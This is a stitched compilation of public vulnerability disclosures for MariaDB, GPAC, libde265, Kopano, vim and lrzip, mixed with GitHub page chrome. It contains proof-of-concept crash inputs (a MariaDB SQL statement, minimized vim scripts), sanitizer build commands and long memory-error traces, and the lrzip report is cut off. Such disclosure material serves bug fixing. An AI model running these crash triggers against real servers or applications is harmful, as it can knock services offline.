MariaDB Server v10.7 and below was discovered to contain a global buffer overflow in the component decimal_bin_size, which is exploited via specially crafted SQL statements.

PoC:

CREATE TABLE v0 AS SELECT NULL AS v1 FROM DUAL ;

 SELECT 'x' FROM v0 GROUP BY v1 , v1 ORDER BY AVG ( from\_unixtime ( '' ) ) ;

ASAN report:

ersion: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 10000  Source distribution

\=================================================================

\==2869677==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55fa8a50bf90 at pc 0x55fa89dcf30d bp 0x7fb3016d0290 sp 0x7fb3016d0280

READ of size 4 at 0x55fa8a50bf90 thread T13

    #0 0x55fa89dcf30c in decimal\_bin\_size /experiment/mariadb-server/strings/decimal.c:1551

    #1 0x55fa88cd14d2 in my\_decimal\_get\_binary\_size(unsigned short, unsigned short) /experiment/mariadb-server/sql/my\_decimal.h:346

    #2 0x55fa88cd14d2 in Type\_handler\_decimal\_result::sort\_length(THD\*, Type\_std\_attributes const\*, SORT\_FIELD\_ATTR\*) const /experiment/mariadb-server/sql/filesort.cc:2182

    #3 0x55fa88cd9bbd in sortlength /experiment/mariadb-server/sql/filesort.cc:2258

    #4 0x55fa88cd9bbd in filesort(THD\*, TABLE\*, Filesort\*, Filesort\_tracker\*, JOIN\*, unsigned long long) /experiment/mariadb-server/sql/filesort.cc:251

    #5 0x55fa886c0698 in create\_sort\_index(THD\*, JOIN\*, st\_join\_table\*, Filesort\*) /experiment/mariadb-server/sql/sql\_select.cc:24386

    #6 0x55fa886c10fe in st\_join\_table::sort\_table() /experiment/mariadb-server/sql/sql\_select.cc:22060

    #7 0x55fa886c1373 in join\_init\_read\_record(st\_join\_table\*) /experiment/mariadb-server/sql/sql\_select.cc:21999

    #8 0x55fa886f3cce in AGGR\_OP::end\_send() /experiment/mariadb-server/sql/sql\_select.cc:29470

    #9 0x55fa886f45cf in sub\_select\_postjoin\_aggr(JOIN\*, st\_join\_table\*, bool) /experiment/mariadb-server/sql/sql\_select.cc:20765

    #10 0x55fa8871882b in do\_select /experiment/mariadb-server/sql/sql\_select.cc:20604

    #11 0x55fa8871882b in JOIN::exec\_inner() /experiment/mariadb-server/sql/sql\_select.cc:4735

    #12 0x55fa8871a592 in JOIN::exec() /experiment/mariadb-server/sql/sql\_select.cc:4513

    #13 0x55fa88712b5a in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4991

    #14 0x55fa88714654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #15 0x55fa88557d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #16 0x55fa88581420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #17 0x55fa885865a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #18 0x55fa8858c60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #19 0x55fa8859173c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #20 0x55fa8894ce56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #21 0x55fa8894d33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #22 0x55fa893ddc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #23 0x7fb32095f258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #24 0x7fb32050a5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x55fa8a50bf90 is located 16 bytes to the left of global variable 'dig2bytes' defined in '/experiment/mariadb-server/strings/decimal.c:132:18' (0x55fa8a50bfa0) of size 40

0x55fa8a50bf90 is located 16 bytes to the right of global variable 'frac\_max' defined in '/experiment/mariadb-server/strings/decimal.c:133:19' (0x55fa8a50bf60) of size 32

SUMMARY: AddressSanitizer: global-buffer-overflow /experiment/mariadb-server/strings/decimal.c:1551 in decimal\_bin\_size

Shadow bytes around the buggy address:

  0x0abfd14997a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

\=>0x0abfd14997f0: f9 f9\[f9\]f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9

  0x0abfd1499800: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00

  0x0abfd1499810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

Thread T13 created by T0 here:

    #0 0x7fb320f92fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55fa893ddea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55fa893ddea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55fa8824eb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55fa8824eb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55fa8825a7b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55fa8825b36f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55fa8825ea52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb320433b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

\==2869677==ABORTING

CVE-2022-27387: [MDEV-26422] ASAN: global-buffer-overflow in decimal_bin_size on SELECT

GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a stack-overflow vulnerability in function gf_isom_get_sample_for_movie_time of mp4box.

CVE-2022-27145: There is a statck-overflow detected by AddressSanitizer · Issue #2108 · gpac/gpac

Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to and including 1.0.8. The fix is established in commit 8e89fe0e175d2870c39486fdd09250b230ec10b8 but does not yet belong to an official release.

Valid

Reported on

May 13th 2021

**✍️ Description**

heap-buffer-overflow of decctx.cc in function read\_sps\_NAL

**🕵️‍♂️ Proof of Concept**

Verification steps： 1.Get the source code of Bento4 2.Compile the Bento4

    $ ./autogen.sh
    $ export CFLAGS="-g -lpthread -fsanitize=address"
    $ export CXXFLAGS="-g -lpthread -fsanitize=address"
    $ CC=clang CXX=clang++ ./configure --disable-shared
    $ make -j 32
    

3.run

    $./dec265 poc
    

**💥 Impact**

This vulnerability is capable of DDOS or code execution

Fixed in 8e89fe0e175d2870c39486fdd09250b230ec10b8

@farindk - thanks for the information. Would you be able to approve and confirm the fix using the action buttons in the drop-down section above?

Dirk Farin validated this vulnerability 10 months ago

RouX has been awarded the disclosure bounty

The fix bounty is now up for grabs

This vulnerability will not receive a CVE

to join this conversation

Fixed in 8e89fe0e175d2870c39486fdd09250b230ec10b8

@farindk - thanks for the information. Would you be able to approve and confirm the fix using the action buttons in the drop-down section above?

Dirk Farin validated this vulnerability 10 months ago

RouX has been awarded the disclosure bounty

The fix bounty is now up for grabs

This vulnerability will not receive a CVE

to join this conversation

CVE-2022-1253: Heap-based Buffer Overflow in libde265

An issue in provider/libserver/ECKrbAuth.cpp of Kopano-Core v11.0.2.51 contains an issue which allows attackers to authenticate even if the user account or password is expired.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Overview
*   Repositories
*   Packages
*   People

**Pinned**

1.  Read-only mirror of Kopano Core git repo
    
    C++ 50 29
    

3.  Read-only mirror of the Kopano WebApp git repo
    
    JavaScript 19 22
    
4.  Material from the Kopano workshop at the 2021 Univention Summit
    
    Shell 1
    

**Repositories**

Type

Select type

All Public Sources Forks Archived Mirrors Templates

Language

Select language

All C# C++ Go HTML JavaScript PHP Python Shell TypeScript

Sort

Select order

Last updated Name Stars

*   kcc-go Public
    
    This implements a minimal client interfacing with a couple of SOAP methods of a Kopano server.
    
    Go 0 Apache-2.0
    
    3 0 3
    
    Updated Mar 4, 2023
    
*   kopano-webapp Public
    
    Read-only mirror of the Kopano WebApp git repo
    
    JavaScript
    
    19 22 0 5
    
    Updated Mar 2, 2023
    
*   oidc-go Public
    
    Oidc-go is a Go package to provide common helpers to interface with OpenID Connect servers.
    
    Go
    
    2
    
    Apache-2.0
    
    1 0 1
    
    Updated Feb 25, 2023
    
*   kwmserver Public
    
    Kopano Web Meetings Server implements the signaling/channelling server for Kopano Web Meetings
    
    Go
    
    5 3 1 3
    
    Updated Feb 24, 2023
    
*   libkcoidc Public
    
    This project implements a C shared library with a public API to validate Kopano Konnect tokens (JSON Web Tokens).
    
    Go 0 0
    
    2 2
    
    Updated Feb 24, 2023
    
*   kapi Public
    
    Kopano API provides a web service with the endpoints to interface with Kopano via HTTP APIs.
    
    Go
    
    3
    
    0
    
    0 1
    
    Updated Feb 15, 2023
    
*   pubsjs Public
    
    Kopano API Pubs Client Library (pubsjs)
    
    TypeScript 0 MIT 0
    
    0 16
    
    Updated Jan 7, 2023
    
*   kwmjs Public
    
    Kopano Web Meetings Client Library (kwmjs)
    
    TypeScript
    
    1
    
    MIT 0
    
    0 11
    
    Updated Jan 7, 2023
    
*   kpop Public
    
    Kpop is a collection of React UI components and UI uitilites for Kopano Web apps
    
    JavaScript 0 Apache-2.0
    
    1 0 17
    
    Updated Dec 10, 2022
    
*   meet Public
    
    A PWA for doing video meetings
    

**Most used topics**

CVE-2022-26562: Kopano

heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647.

**Description**

When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

**Proof of Concept**

Here is the minimized poc

    norm300gr0
    so
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
    =================================================================
    ==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
    READ of size 1 at 0x612000004c6c thread T0
        #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
        #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
        #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
    allocated by thread T0 here:
        #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
        #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
        #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
        #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
        #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
        #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
    Shadow bytes around the buggy address:
      0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
      0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
      0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2393051==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-1160: heap buffer overflow in get_one_sourceline in vim

Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.

✍️ Description

When fuzzing vim commit 9dac9b175, I discovered a use after free. I'm testing on ubuntu 20.04 with clang 13.

**Proof of Concept**

Here is the minimized poc

    s/\v/\r
    /\%'(\{,600}
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!
    =================================================================
    ==49542==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000062b0 at pc 0x0000008636a8 bp 0x7fffffff5980 sp 0x7fffffff5978
    READ of size 1 at 0x6020000062b0 thread T0
        #0 0x8636a7 in utf_ptr2char /home/aldo/vimtes/src/mbyte.c:1789:9
        #1 0xaa6a07 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3317:12
        #2 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #3 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #4 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #5 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #6 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #7 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #8 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #9 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #10 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #11 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #12 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #13 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #14 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #15 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #16 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #17 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #18 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #19 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #20 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #21 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #22 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x6020000062b0 is located 0 bytes inside of 1-byte region [0x6020000062b0,0x6020000062b1)
    freed by thread T0 here:
        #0 0x499a22 in free (/home/aldo/vimtes/src/vim+0x499a22)
        #1 0x4cb4e8 in vim_free /home/aldo/vimtes/src/alloc.c:623:2
        #2 0x8768ee in ml_flush_line /home/aldo/vimtes/src/memline.c:4064:2
        #3 0x884c9c in ml_get_buf /home/aldo/vimtes/src/memline.c:2651:2
        #4 0x8823b8 in ml_get /home/aldo/vimtes/src/memline.c:2564:12
        #5 0x8b2a93 in dec /home/aldo/vimtes/src/misc2.c:424:6
        #6 0x8b2cd4 in decl /home/aldo/vimtes/src/misc2.c:443:14
        #7 0xc86249 in findsent /home/aldo/vimtes/src/textobject.c:53:7
        #8 0x847de7 in getmark_buf_fnum /home/aldo/vimtes/src/mark.c:354:6
        #9 0x8477a4 in getmark_buf /home/aldo/vimtes/src/mark.c:287:12
        #10 0xaa6d84 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3364:9
        #11 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #12 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #13 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #14 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #15 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #16 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #17 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #18 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #19 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #20 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #21 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #22 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #23 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #24 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #25 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #26 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #27 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #28 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #29 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    
    previously allocated by thread T0 here:
        #0 0x499c8d in malloc (/home/aldo/vimtes/src/vim+0x499c8d)
        #1 0x4cb0e0 in lalloc /home/aldo/vimtes/src/alloc.c:248:11
        #2 0x4cb039 in alloc /home/aldo/vimtes/src/alloc.c:151:12
        #3 0xbcc84c in vim_strnsave /home/aldo/vimtes/src/strings.c:44:9
        #4 0x885952 in ml_replace_len /home/aldo/vimtes/src/memline.c:3441:13
        #5 0x885826 in ml_replace /home/aldo/vimtes/src/memline.c:3404:12
        #6 0x6ba35c in ex_substitute /home/aldo/vimtes/src/ex_cmds.c:4665:4
        #7 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #8 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #9 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #10 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #11 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #12 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #13 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #14 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #15 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #16 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #17 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #18 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #19 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/aldo/vimtes/src/mbyte.c:1789:9 in utf_ptr2char
    Shadow bytes around the buggy address:
      0x0c047fff8c00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c20: fa fa 00 00 fa fa 00 00 fa fa 05 fa fa fa 00 fa
      0x0c047fff8c30: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 03 fa
      0x0c047fff8c40: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 00 00
    =>0x0c047fff8c50: fa fa 01 fa fa fa[fd]fa fa fa 00 04 fa fa 00 04
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==49542==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-1154: Use after free in utf_ptr2char in vim

lrzip v0.641 was discovered to contain a multiple concurrency use-after-free between the functions zpaq_decompress_buf() and clear_rulist(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted Irz file.

Dear all,

Our tool report that there would be multiple concurrency use-after-free between zpaq_decompress_buf() function and clear_rulist() function, in the newest master branch 465afe8.

**Brief Explanation**

The related code simplified from stream.c and runzip.c are shown as follow:

// Thread T0                                | // Thread T1
// in clear\_rulist() in runzip.c            | // in zpaq\_decompress\_buf() in steam.c
...                                         | ...
struct runzip\_node \*node = control->ruhead; | if (unlikely(dlen != ucthread->u\_len)) {
struct stream\_info \*sinfo = node->sinfo;    |     ret = -1;
                                            | } else
dealloc(sinfo->ucthreads);                  |     dealloc(c\_buf);
dealloc(sinfo);                             | out:
                                            |     if (ret == -1) {
                                            |         dealloc(ucthread->s\_buf);
		                            |         ucthread->s\_buf = c\_buf;
	                                    |     }

Both thread T0 and thread T1 operate on a shared variable ucthread (i.e., T0 dealloc the a ucthread through dealloc(sinfo->ucthreads);, and T1 use the ucthread in all statements if (unlikely(dlen != ucthread->u_len)), dealloc(ucthread->s_buf);, and ucthread->s_buf = c_buf;).  
However, a use-after-free can occur if the deallocation of ucthread before the use of ucthread.  
For example, the following three thread interleaving can trigger three different UAFs:

_Interleaving (a)_

// Thread T0                                | // Thread T1
                                            |
...                                         | 
struct runzip\_node \*node = control->ruhead; | 
struct stream\_info \*sinfo = node->sinfo;    | 
                                            | 
dealloc(sinfo->ucthreads);                  | 
dealloc(sinfo);                             | 
